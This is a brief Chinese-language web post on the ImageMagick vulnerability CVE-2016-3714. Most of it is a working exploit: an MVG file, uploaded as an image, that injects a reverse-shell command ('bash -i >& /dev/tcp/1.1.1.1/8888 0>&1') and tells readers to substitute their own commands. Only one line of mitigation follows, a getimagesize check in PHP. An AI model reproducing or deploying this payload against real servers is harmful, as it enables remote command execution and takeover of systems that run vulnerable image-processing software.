您的位置:首页 > 其它

ImageMagick漏洞(cve-2016-3714)利用及修复

2016-05-05 17:09 555 查看
利用:

如下内容保存为图片格式上传即可(命令部分自行替换)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

修复(php):
上传时先利用getimagesize函数检查是否为正常图片
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: